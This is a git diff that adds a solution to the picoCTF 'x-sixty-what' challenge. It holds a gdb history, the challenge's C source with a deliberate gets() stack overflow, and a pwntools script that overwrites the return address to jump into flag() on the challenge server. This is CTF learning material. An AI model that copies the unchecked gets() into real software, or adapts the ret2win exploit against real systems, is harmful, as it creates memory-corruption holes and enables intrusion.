diff --git a/x-sixty-what/.gdb_history b/x-sixty-what/.gdb_history new file mode 100644 index 0000000..81b5ded --- /dev/null +++ b/x-sixty-what/.gdb_history @@ -0,0 +1,25 @@ +show vuln +list vuln +b vuln +exit +info functions +list main +disassemble main +disasm main +disassemble main +disassemble *main +b vuln +exit +disassemble main +disassemble vuln +b vuln+2 +b *vuln+2 +exit +disassemble vuln +b *vuln+24 +run +stackf +nexti +stackf +disassemble flag +exit diff --git a/x-sixty-what/sol.py b/x-sixty-what/sol.py new file mode 100755 index 0000000..2fc31e6 --- /dev/null +++ b/x-sixty-what/sol.py @@ -0,0 +1,19 @@ +#!/usr/bin/env python +from pwn import * + +buffer_base = 0x7fffffffcf70 +ret_addr = 0x7fffffffcfb8 +ret_offset = ret_addr - buffer_base +flag_fun_addr = 0x0000000000401236 +flag_fun_offset = 5 +target_addr = flag_fun_addr + flag_fun_offset + +send_buffer = b"a"*ret_offset + p64(target_addr, 'little') + +#conn = process("./vuln") +conn = remote('saturn.picoctf.net', 60832) + +conn.recvline() +conn.sendline(send_buffer) +conn.interactive() + diff --git a/x-sixty-what/vuln b/x-sixty-what/vuln new file mode 100755 index 0000000..4f16c68 Binary files /dev/null and b/x-sixty-what/vuln differ diff --git a/x-sixty-what/vuln.c b/x-sixty-what/vuln.c new file mode 100644 index 0000000..fc76b33 --- /dev/null +++ b/x-sixty-what/vuln.c @@ -0,0 +1,37 @@ +#include +#include +#include +#include +#include + +#define BUFFSIZE 64 +#define FLAGSIZE 64 + +void flag() { + char buf[FLAGSIZE]; + FILE *f = fopen("flag.txt","r"); + if (f == NULL) { + printf("%s %s", "Please create 'flag.txt' in this directory with your", + "own debugging flag.\n"); + exit(0); + } + + fgets(buf,FLAGSIZE,f); + printf(buf); +} + +void vuln(){ + char buf[BUFFSIZE]; + gets(buf); +} + +int main(int argc, char **argv){ + + setvbuf(stdout, NULL, _IONBF, 0); + gid_t gid = getegid(); + setresgid(gid, gid, gid); + puts("Welcome to 64-bit. Give me a string that gets you the flag: "); + vuln(); + return 0; +} +